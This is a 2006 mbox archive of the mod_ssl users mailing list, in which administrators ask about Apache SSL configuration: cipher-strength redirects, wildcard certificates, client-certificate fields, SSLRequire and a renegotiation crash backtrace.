______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 10 18:25:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E1D4B14D868; Fri, 10 Mar 2006 18:25:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id B79B914D831
	for ; Fri, 10 Mar 2006 18:25:18 +0100 (CET)
Received: from werum815.werum.net (werum815.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id 05E95F9378
	for ; Fri, 10 Mar 2006 18:29:49 +0100 (CET)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 35458932C1;
	Fri, 10 Mar 2006 18:25:11 +0100 (CET)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 09314-03; Fri, 10 Mar 2006 18:23:53 +0100 (CET)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id A32A0932BF
	for ; Fri, 10 Mar 2006 18:25:10 +0100 (CET)
Message-ID: <4411B677.1000605@werum.de>
Date: Fri, 10 Mar 2006 18:25:11 +0100
From: Eckard Wille 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: ensure 128 bit encryption [update]
References: <28346.1011372586@www21.gmx.net> <20020121184917.A6497449@ohm.arago.de>
In-Reply-To: <20020121184917.A6497449@ohm.arago.de>
X-Enigmail-Version: 0.94.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.856 tagged_above=-999 required=5 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thomas Binder schrieb:
>>>     SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 )
>> with this option, the user gets no https connection if he has <
>> 128 bit. but the user should get a error page. so it must be
>> possible to establish a connection with <128 bit but redirected
>> to the error page.
> 
> Try the following (inside ... 
> SSLOptions +StdEnvVars
> RewriteBase absolute-filesystem-path-to-directory
> RewriteCond %{ENV:SSL_CIPHER_EXPORT} "^true$"
> RewriteRule ".*" /noexport.html
> 
> Now, when someone accesses your directory with an export browser,
> (s)he will be redirected to the page /noexport.html, which may
> then explain what's wrong.

Hi all,

just wanted to set up the described configuration with Apache 2.0.54
and OpenSSL 0.9.7.g, but stumbled over the environment changes which
did not jump in my face while reading the docs. Seems like the SSL
environment isn't reachable for mod_rewrite via ENV: or LA-U: prefix,
instead the prefix SSL: has to be used, described in the change report
> http://mail-archives.apache.org/mod_mbox/httpd-bugs/200408.mbox/%3C20040804130814.12865.qmail@nagoya.betaversion.org%3E
Maybe Ralf could add this SSL:-prefix regarding mod_rewrite to his
excellent docs somewhere around the environment references, because
most of the existing howtos on the net do not include that new syntax.
The following lines in the global ssl environment did the trick
for our ssl hosts:

SSLOptions +StdEnvVars
RewriteEngine on
RewriteCond %{SSL:SSL_CIPHER_USEKEYSIZE} <128
RewriteCond %{REQUEST_URI} !^/error/.*$
RewriteRule .* /error/weak_encryption.html [R,L]

Greetings from Germany,
Eckard




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 16 10:11:48 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 63AFF14D9C4; Thu, 16 Mar 2006 10:11:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp4-g19.free.fr (smtp4-g19.free.fr [212.27.42.30])
	by master.modssl.org (Postfix) with ESMTP id 26DF914D83C
	for ; Thu, 16 Mar 2006 10:11:47 +0100 (CET)
Received: from mail1.intra.tuxee.net (tuxee.net [82.241.80.108])
	by smtp4-g19.free.fr (Postfix) with ESMTP id 6D2E254B16
	for ; Thu, 16 Mar 2006 10:11:43 +0100 (CET)
Received: from mau.intra.tuxee.net (mau.intra.tuxee.net [192.168.1.10])
	by mail1.intra.tuxee.net (8.13.4/8.13.4) with ESMTP id k2G9CGnN003474
	for ; Thu, 16 Mar 2006 09:12:16 GMT
Received: from mau.intra.tuxee.net (localhost [127.0.0.1])
	by mau.intra.tuxee.net (8.13.4/8.13.4) with ESMTP id k2G9Bbvv031578
	for ; Thu, 16 Mar 2006 10:11:38 +0100
Received: (from fred@localhost)
	by mau.intra.tuxee.net (8.13.4/8.13.4/Submit) id k2G9Bbjc031577;
	Thu, 16 Mar 2006 10:11:37 +0100
X-Authentication-Warning: mau.intra.tuxee.net: fred set sender to frederic@jolliton.com using -f
From: =?iso-8859-1?Q?Fr=E9d=E9ric_Jolliton?= 
To: modssl-users@modssl.org
Subject: Are multiple  ok with wildcard cert ?
Date: Thu, 16 Mar 2006 10:11:37 +0100
Message-ID: <86k6au3gae.fsf@mau.intra.tuxee.net>
User-Agent: Gnus/5.110004 (No Gnus v0.4) Emacs/22.0.50 (gnu/linux)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Fr=E9d=E9ric_Jolliton?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

(Apache 2.0.55, Linux 2.6)

I can't find authoritative answer about the following question.

I would like to be sure that I can have multiple VirtualHost
configured simultaneously for HTTP and HTTPS (port 80 and port 443
respectively) as presented below.

If I've a certificate with 'cn' to '*.example.com' and the following
Apache configuration, is that ok ? Currently it works fine, but I'm
not sure if I'm relying on some unspecified/undefined behaviors.

Also, is this dummy VirtualHost (the first one) the correct way to
"force" a given port to answer HTTP instead of HTTPS ? (I know that
it's the other way, where the "first" virtual host with enabled SSL
determine port with HTTPS.)

Again, there is no problems with this config, but I was just wondering
about its validity.

-=3D-=3D-
Listen 80
Listen 443

NameVirtualHost *:80
NameVirtualHost *:443


  # Dummy empty VirtualHost to ensure than port 80 is HTTP



  Include common-ssl.conf
  ServerName foo.example.com
  [..]



  Include common-ssl.conf
  ServerName bar.example.com
  [..]

-=3D-=3D-

and common-ssl.conf contains:

-=3D-=3D-

  SSLEngine on
  SSLCertificateFile conf/ssl/web.example.com-cert.pem
  SSLCertificateKeyFile conf/ssl/web.example.com-key.pem
  SSLCertificateChainFile conf/ssl/root-cert.pem
  [.. other SSL options ..]

-=3D-=3D-

--=20
Fr=E9d=E9ric Jolliton
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 24 18:22:09 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BA35814D861; Fri, 24 Mar 2006 18:22:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cuey.augustschell.com (cuey.augustschell.com [65.120.79.175])
	by master.modssl.org (Postfix) with SMTP id 3E98214D833
	for ; Fri, 24 Mar 2006 18:22:08 +0100 (CET)
Received: (qmail 17424 invoked by uid 509); 24 Mar 2006 17:22:03 -0000
Received: from unknown (HELO D7H8TH91) (dennis.sinelnikov@augustschell.com@unknown)
  by unknown with ESMTPA; 24 Mar 2006 17:22:03 -0000
From: "Dennis Sinelnikov" 
To: 
Subject: SSL_CLIENT_S_DN_UID coming back null in httpd-ssl.conf
Date: Fri, 24 Mar 2006 12:22:05 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0066_01C64F3D.90AEEC20"
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcZPZ3b3k46urbsOR4aEU5Txs2HkrQ==
Message-Id: <20060324172208.3E98214D833@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dennis Sinelnikov" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0066_01C64F3D.90AEEC20
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

All,

 

I'm having trouble pulling off SSL_CLIENT_S_DN_UID of off the client cert.

 

I can pull off the full DN or other fields within DN like email and cn, but
no go for UID

 

So. 

CustomLog /usr/local/apache2/logs/ssl_request_log "%{SSL_CLIENT_S_DN}x"

Will log:

/C=USA/O=August Schell Enterprises/CN=Dennis
Sinelnikov/emailAddress=dennis.sinelnikov@augustschell.com/UID=dennis

 

Has anyone else experienced this problem before?  Any suggestions are
welcome!

I'm thinking about using regular expressions and parsing the DN to get UID.

 

Thanks,

Dennis

 

 


------=_NextPart_000_0066_01C64F3D.90AEEC20
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


















All,



 



I’m having trouble pulling off =
SSL_CLIENT_S_DN_UID of
off the client cert.



 



I can pull off the full DN or other fields within DN =
like
email and cn, but no go for UID



 



So… 



CustomLog /usr/local/apache2/logs/ssl_request_log
"%{SSL_CLIENT_S_DN}x"



Will log:



/C=3DUSA/O=3DAugust Schell Enterprises/CN=3DDennis Sinelnikov/emailAddress=3Ddennis.sinelnikov@augustschell=
.com/UID=3Ddennis



 



Has anyone else experienced this problem =
before?  Any
suggestions are welcome!



I’m thinking about using regular expressions =
and
parsing the DN to get UID.



 



Thanks,



Dennis



 



 









------=_NextPart_000_0066_01C64F3D.90AEEC20--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  4 14:31:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B909F14D9F7; Tue,  4 Apr 2006 14:31:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.su.se (smtp1.su.se [130.237.162.112])
	by master.modssl.org (Postfix) with ESMTP id 5156F14D829
	for ; Tue,  4 Apr 2006 14:30:59 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by smtp1.su.se (Postfix) with ESMTP id 3EC17740B7;
	Tue,  4 Apr 2006 14:30:53 +0200 (CEST)
Received: from smtp1.su.se ([127.0.0.1])
 by localhost (smtp1.su.se [127.0.0.1]) (amavisd-new, port 10024) with LMTP
 id 02124-01-69; Tue,  4 Apr 2006 14:30:52 +0200 (CEST)
Received: from [130.237.95.69] (nutcracker.it.su.se [130.237.95.69])
	(using TLSv1 with cipher RC4-SHA (128/128 bits))
	(No client certificate requested)
	by smtp1.su.se (Postfix) with ESMTP id 9AE6F74032;
	Tue,  4 Apr 2006 14:30:52 +0200 (CEST)
Mime-Version: 1.0 (Apple Message framework v749.3)
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="Apple-Mail-7-490408871"
Message-Id: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se>
Cc: Klas Lindfors 
Content-Transfer-Encoding: 7bit
From: =?ISO-8859-1?Q?Love_H=F6rnquist_=C5strand?= 
Subject: ssl_callback_SSLVerify re-negotiation handshake crash
Date: Tue, 4 Apr 2006 14:30:49 +0200
To: modssl-users@modssl.org
X-Pgp-Agent: GPGMail 1.1.1 (Tiger)
X-Mailer: Apple Mail (2.749.3)
X-Virus-Scanned: by amavisd-new at smtp.su.se
X-Spam-Status: No, hits=-1.562 tagged_above=-99 required=7 tests=[AWL=0.103,
 BAYES_00=-1.665]
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Love_H=F6rnquist_=C5strand?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--Apple-Mail-7-490408871
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII; format=flowed

Hello,

We are running 2.8.25-1.3.34 with openssl 0.9.7g. When using
client authentication we have crashes in ssl_callback_SSLVerify
relasted calls. Please see backtrace below.

The last entires in the log before the child httpd starts crashing is:

Awaiting re-negotiation handshake

Have anyone seen problems like this before and have a solution ?
If not, we'll go ahead and add more logging and do more debugging of
the problem.

Love


(gdb) bt
#0  CRYPTO_get_ex_data (ad=0xe8, idx=137019688) at ex_data.c:628
#1  0x4035c035 in SSL_get_ex_data (s=0x1, idx=296) at ssl_lib.c:2220
#2  0x4031cf08 in ssl_callback_SSLVerify (ok=1, ctx=0xbfffed20)
     at ssl_engine_kernel.c:1507
#3  0x404125ec in internal_verify (ctx=0x87f55e0) at x509_vfy.c:880
#4  0x40411e66 in X509_verify_cert (ctx=0xbfffed20) at x509_vfy.c:306
#5  0x00000002 in ?? ()
(gdb) print *ssl
Cannot access memory at address 0x0
(gdb) print *ctx
$19 = {
   ctx = 0x82aa680,
   current_method = 0,
   cert = 0x87f9740,
   untrusted = 0x881e2e8,
   purpose = 1,
   trust = 2,
   check_time = 0,
   flags = 0,
   other_ctx = 0x0,
   verify = 0x40412440 ,
   verify_cb = 0x4031cecd ,
   get_issuer = 0x40416750 ,
   check_issued = 0x40413200 ,
   check_revocation = 0x40413270 ,
   get_crl = 0x40413410 ,
   check_crl = 0x40413460 ,
   cert_crl = 0x40413700 ,
   cleanup = 0,
   depth = 9,
   valid = 0,
   last_untrusted = 2,
   chain = 0x87f55e0,
   error_depth = 2,
   error = 0,
   current_cert = 0x82ac028,
   current_issuer = 0x82ac028,
   current_crl = 0x0,
   ex_data = {
     sk = 0x881bd10,
     dummy = 142729960
   }


--Apple-Mail-7-490408871
content-type: application/pgp-signature; x-mac-type=70674453;
	name=PGP.sig
content-description: This is a digitally signed message part
content-disposition: inline; filename=PGP.sig
content-transfer-encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFEMmb7Jyok7cfdyBYRAotHAJ49Dr3vSsxF1GTGwqdWUsLBZmbL5gCffeWm
ka4w8UbHA7vtfgBa7ugMa6U=
=DWK5
-----END PGP SIGNATURE-----

--Apple-Mail-7-490408871--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  4 16:31:44 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EE6EB14D9F7; Tue,  4 Apr 2006 16:31:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.183])
	by master.modssl.org (Postfix) with ESMTP id 9EA5A14D829
	for ; Tue,  4 Apr 2006 16:31:43 +0200 (CEST)
Received: from [62.128.13.23] (helo=[192.168.10.164])
	by mrelayeu.kundenserver.de (node=mrelayeu6) with ESMTP (Nemesis),
	id 0ML29c-1FQmZA3J5W-0001Tp; Tue, 04 Apr 2006 16:31:33 +0200
Message-ID: <4432834F.8010102@leadtracking.de>
Date: Tue, 04 Apr 2006 16:31:43 +0200
From: Hostmaster Leadtracking 
Organization: Phocus Direct Communication GmbH
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: mod_ssl mailing list 
Subject: Weird problem with client certificates
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
X-Provags-ID: kundenserver.de abuse@kundenserver.de login:8b406e266c143bd852a09cfba61bb463
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hostmaster Leadtracking 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

we are running Apache 2.0.53 with openssl 0.9.7e on linux. There's a 
weird problem using client certificates. When accessing 
"/srv/www/ssldocs/secure" via https://www.domain.com/secure there's 
absolutely no client certificate checked. Access is possible without 
valid cert. My vhost is written like shown on modssl.org, I tried every 
possible combination, but no success. After reading numerous faq's and 
bbs and finding nothing about that problem, I wanted to ask, if anybody 
knows about this problem or has as solution for this.

Thanks alot so far,


Alex


DocumentRoot /srv/www/ssldocs
ServerName SSL

SSLEngine on
SSLCipherSuite HIGH:MEDIUM
SSLOptions +StdEnvVars +StrictRequire
SSLCertificateFile /etc/apache2/ssl.crt/server.crt
SSLCertificateKeyFile /etc/apache2/ssl.key/server.key

SSLVerifyClient none
SSLVerifyDepth 5
SSLCACertificateFile /etc/apache2/ssl.crt/clientca.crt
SSLCACertificatePath /etc/apache2/ssl.crt


 SSLVerifyClient require
 SSLRequireSSL




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 14:06:47 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C1F2C14D9FC; Wed,  5 Apr 2006 14:06:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pre-secure.de (mail.pre-secure.de [213.238.39.87])
	by master.modssl.org (Postfix) with ESMTP id 873A614D82F
	for ; Wed,  5 Apr 2006 14:06:47 +0200 (CEST)
Received: by mail.pre-secure.de (Postfix, from userid 2021)
	id 162A241C15E; Wed,  5 Apr 2006 14:06:41 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.pre-secure.de (Postfix) with ESMTP id F03A641C15C
	for ; Wed,  5 Apr 2006 14:06:40 +0200 (CEST)
Received: from mail.pre-secure.de ([127.0.0.1])
 by localhost (mail.pre-secure.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 18039-13 for ;
 Wed,  5 Apr 2006 14:06:37 +0200 (CEST)
Received: from imap.pre-secure.de (jin_b.pre-secure.de [192.168.0.75])
	by mail.pre-secure.de (Postfix) with ESMTP
	for ; Wed,  5 Apr 2006 14:06:37 +0200 (CEST)
Received: from [192.168.1.21] (p548E99C6.dip0.t-ipconnect.de [84.142.153.198])
	by imap.pre-secure.de (Postfix) with ESMTP id CB5D03994F
	for ; Wed,  5 Apr 2006 14:06:36 +0200 (CEST)
Message-ID: <4433B34A.3080103@pre-secure.de>
Date: Wed, 05 Apr 2006 14:08:42 +0200
From: Olaf Gellert 
Organization: PRESECURE Consulting GmbH
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl: SSLRequire
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at mail.pre-secure.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I try to do X.509 client authentication with Apache
Apache/2.0.54. This works fine. Now I want to check
for certain fields in the client certificate with
SSLRequire. Even though I ask that

%{SSL_CLIENT_S_DN_CN} eq "Testuser"

the server permits accesss to a client with
SSL_CLIENT_S_DN_CN="testuser2". What's wrong?

Here is the according section from my config:

     SSLOptions +FakeBasicAuth +StdEnvVars +CompatEnvVars +StrictRequire
     
       AllowOverride None
       Options +FollowSymLinks +Includes
       Order deny,allow
       Deny from all
       Allow from localhost
       SSLRequireSSL
       SSLRequire (    %{SSL_CLIENT_S_DN_O} eq "SSLTest SubCA 01" \
                    && %{SSL_CLIENT_S_DN_OU} eq "User Certificates" \
                    && %{SSL_CLIENT_S_DN_CN} eq "Testuser" )
    

Anything forgotten? If I print out the environment from
within the webpage (with SSI #printenv), I see (among all
the other variables):

SSL_CLIENT_S_DN_O=SSLTest SubCA 01
SSL_CLIENT_S_DN_OU=User Certificates
SSL_CLIENT_S_DN_CN=testuser2

Hmmm.... Any clues?

Olaf

-- 
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 16:39:07 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A328A14D9D3; Wed,  5 Apr 2006 16:39:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pre-secure.de (mail.pre-secure.de [213.238.39.87])
	by master.modssl.org (Postfix) with ESMTP id 6865714D82F
	for ; Wed,  5 Apr 2006 16:39:06 +0200 (CEST)
Received: by mail.pre-secure.de (Postfix, from userid 2021)
	id 5AC5741C15E; Wed,  5 Apr 2006 16:39:00 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.pre-secure.de (Postfix) with ESMTP id 3EF0B41C15C
	for ; Wed,  5 Apr 2006 16:39:00 +0200 (CEST)
Received: from mail.pre-secure.de ([127.0.0.1])
 by localhost (mail.pre-secure.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 04118-12 for ;
 Wed,  5 Apr 2006 16:38:56 +0200 (CEST)
Received: from imap.pre-secure.de (jin_b.pre-secure.de [192.168.0.75])
	by mail.pre-secure.de (Postfix) with ESMTP
	for ; Wed,  5 Apr 2006 16:38:56 +0200 (CEST)
Received: from [192.168.1.21] (p548E99C6.dip0.t-ipconnect.de [84.142.153.198])
	by imap.pre-secure.de (Postfix) with ESMTP id D70E239976
	for ; Wed,  5 Apr 2006 16:38:55 +0200 (CEST)
Message-ID: <4433B34A.3080103@pre-secure.de>
Date: Wed, 05 Apr 2006 14:08:42 +0200
From: Olaf Gellert 
Organization: PRESECURE Consulting GmbH
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl: SSLRequire
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at mail.pre-secure.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I try to do X.509 client authentication with Apache
Apache/2.0.54. This works fine. Now I want to check
for certain fields in the client certificate with
SSLRequire. Even though I ask that

%{SSL_CLIENT_S_DN_CN} eq "Testuser"

the server permits accesss to a client with
SSL_CLIENT_S_DN_CN="testuser2". What's wrong?

Here is the according section from my config:

     SSLOptions +FakeBasicAuth +StdEnvVars +CompatEnvVars +StrictRequire
     

       AllowOverride None
       Options +FollowSymLinks +Includes
       Order deny,allow
       Deny from all
       Allow from localhost
       SSLRequireSSL
       SSLRequire (    %{SSL_CLIENT_S_DN_O} eq "SSLTest SubCA 01" \
                    && %{SSL_CLIENT_S_DN_OU} eq "User Certificates" \
                    && %{SSL_CLIENT_S_DN_CN} eq "Testuser" )
    

Anything forgotten? If I print out the environment from
within the webpage (with SSI #printenv), I see (among all
the other variables):

SSL_CLIENT_S_DN_O=SSLTest SubCA 01
SSL_CLIENT_S_DN_OU=User Certificates
SSL_CLIENT_S_DN_CN=testuser2

Hmmm.... Any clues?

Olaf

-- 
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 16:46:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B3F6E14D9D3; Wed,  5 Apr 2006 16:46:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.kupplung.de (mail.xn--skitrger-4za.de [62.154.174.130])
	by master.modssl.org (Postfix) with ESMTP id 724EB14D82F
	for ; Wed,  5 Apr 2006 16:46:00 +0200 (CEST)
Received: from MAILSERVER (192.168.100.21)
          by mail.kupplung.de with MERCUR Mailserver (v5.00.17 OTMtMjY5NC01MTM1)
          for ; Wed, 5 Apr 2006 17:01:08 +0200
Received: from 192.168.100.1 [192.168.100.1]
	by MAILSERVER
	with XWall v3.33 ;
	Wed, 5 Apr 2006 17:01:07 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Session Cache is not configured
Date: Wed, 5 Apr 2006 16:45:45 +0200
Message-ID: <89515DCF67A57444B10926F4E4400F411E6781@hermes.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Session Cache is not configured
Thread-Index: AcZYv5+dtAvVT0bSQbGe9SiWywgQpA==
From: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hallo,=20

I have a problem with APACHE MOD SSL. I installed Apache 2.2.0=20
at an Suse Linux System. The Server works fine, also with SSL, but=20
in my SSL LOG the following Error Code is written :

ssl_error.log
-----------------------------------------
[warn] Init: Session Cache is not configured [hint: SSLSessionCache]
-----------------------------------------

I believe that the error is my ssl_global.conf but i found no
further information in the internet ...

ssl_global.conf
----------------------------------------------------
SSLSessionCache         dbm:/var/log/apache2/ssl_cache
SSLSessionCacheTimeout  600
---------------------------------------------------

The following modules are installed

---------------------------------------------------
core_module (static)
mpm_prefork_module (static)
http_module (static)
so_module (static)
suexec_module (shared)
actions_module (shared)
alias_module (shared)
autoindex_module (shared)
cgi_module (shared)
dir_module (shared)
include_module (shared)
log_config_module (shared)
mime_module (shared)
negotiation_module (shared)
setenvif_module (shared)
status_module (shared)
userdir_module (shared)
asis_module (shared)
rewrite_module (shared)
ssl_module (shared)
vhost_alias_module (shared)
php5_module (shared)
authn_dbm_module (shared)
auth_basic_module (shared)
authz_groupfile_module (shared)
authz_host_module (shared)
authn_file_module (shared)
authz_user_module (shared)
authz_default_module (shared)
---------------------------------------------------


I hope that someone can help me :)

Lars Steinbr=FCgger
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 16:50:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D9BE514D9FC; Wed,  5 Apr 2006 16:50:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail91.messagelabs.com (mail91.messagelabs.com [194.106.220.35])
	by master.modssl.org (Postfix) with SMTP id 9D72C14D82F
	for ; Wed,  5 Apr 2006 16:50:40 +0200 (CEST)
X-VirusChecked: Checked
X-Env-Sender: Oliver.Schaudt@unilog.de
X-Msg-Ref: server-10.tower-91.messagelabs.com!1144248631!16578295!1
X-StarScan-Version: 5.5.9.1; banners=-,-,-
X-Originating-IP: [194.45.208.28]
Received: (qmail 16822 invoked from network); 5 Apr 2006 14:50:31 -0000
Received: from mail.unilog.de (HELO mail.unilog.de) (194.45.208.28)
  by server-10.tower-91.messagelabs.com with SMTP; 5 Apr 2006 14:50:31 -0000
Received: from ms01012.avinci.de
	([10.200.1.28])
	by mail.unilog.de; Wed, 05 Apr 2006 16:50:11 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C658C0.E9EDB2EA"
Subject: RE: mod_ssl: SSLRequire
